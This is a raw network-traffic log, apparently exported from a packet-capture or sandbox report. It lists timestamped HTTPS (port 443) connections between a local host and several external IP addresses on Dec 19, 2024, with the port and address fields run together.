                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881114006 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881205082 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881588936 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881637096 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881752014 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881869078 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881908894 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881984949 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.883479118 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.883508921 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.883527040 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.883646965 CET49796443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884213924 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884226084 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884439945 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884578943 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884599924 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884655952 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884751081 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.884769917 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885154009 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885169983 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885386944 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885406017 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885843039 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885843992 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885854959 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.885859013 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.919339895 CET44349795162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.919368982 CET44349787162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.923333883 CET44349788172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.923376083 CET44349797172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.927356005 CET44349796172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.927385092 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.946180105 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.950123072 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.950309038 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.950333118 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.967221022 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.967300892 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.967318058 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.977087975 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.977299929 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.977315903 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.988440990 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.988569975 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.988594055 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.998296022 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.998383045 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.998399019 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.016093016 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.016179085 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.016215086 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024429083 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024450064 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024455070 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024482965 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024502039 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024511099 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024525881 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024549961 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024564028 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.024581909 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.065880060 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.065932035 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.065956116 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.069988966 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.070064068 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.070074081 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.121182919 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.121279001 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.123933077 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.123941898 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.124300957 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.131953001 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140047073 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140065908 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140094042 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140122890 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140131950 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.140172958 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.141588926 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.141894102 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.141923904 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.150043964 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.150116920 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.150125980 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.158513069 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.158690929 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.158699989 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.171950102 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.172034025 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.172069073 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.174465895 CET44349787162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.174583912 CET44349787162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.174647093 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.174684048 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.175359964 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.180413008 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.180490017 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.184701920 CET44349788172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.184803963 CET49788443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.185506105 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.185575962 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.185595989 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.193267107 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.193294048 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.193392992 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.193392992 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.193408012 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.197540045 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.197601080 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.197642088 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.211257935 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.211340904 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.211374044 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.225460052 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.225567102 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.225603104 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.238625050 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.238796949 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.238841057 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.251447916 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.251499891 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.251518011 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.263235092 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.263304949 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.263330936 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.275146961 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.275213957 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.275249004 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.286943913 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.287000895 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.287030935 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.289627075 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.298835039 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.298994064 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.299019098 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305835009 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305846930 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305866957 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305880070 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305902958 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305912018 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305919886 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305968046 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.305968046 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.323934078 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.324002981 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.324043036 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.326134920 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.326181889 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.326210022 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.334763050 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.334831953 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.334865093 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335074902 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335086107 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335120916 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335130930 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335151911 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335160017 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335186958 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.335217953 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.342505932 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.342721939 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.342752934 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.350419998 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.350603104 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.350615978 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357575893 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357588053 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357614040 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357641935 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357650995 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357676983 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.357702017 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.358023882 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.358067989 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.358078957 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.365650892 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.365695953 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.365705967 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.373148918 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.373256922 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.373286009 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.380829096 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.380891085 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.380909920 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.388432026 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.388492107 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.388513088 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.396079063 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.396131039 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.396156073 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.404525042 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.404624939 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.404644966 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.406933069 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.406961918 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.407033920 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.407044888 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.407114029 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.411113024 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.411186934 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.411202908 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.418901920 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.418961048 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.418986082 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.426601887 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.430320024 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.430340052 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.434521914 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.434578896 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.434606075 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.441572905 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.441665888 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.441692114 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.449153900 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.450519085 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.450531006 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.457048893 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.458569050 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.458584070 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.465082884 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.466603994 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.466613054 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.476898909 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.478310108 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.478349924 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.480067968 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.480195999 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.480214119 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.486088991 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.486176968 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.486211061 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492074013 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492101908 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492141008 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492147923 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492186069 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.492289066 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.493473053 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.493525982 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.493544102 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.500473022 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.502660990 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.502680063 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.505328894 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.505350113 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.505423069 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.505429983 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.505491972 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.513783932 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.513850927 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.513922930 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.513946056 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.513998032 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.514969110 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.518626928 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.518692970 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.518707991 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.520967007 CET44349779162.125.69.15192.168.2.6
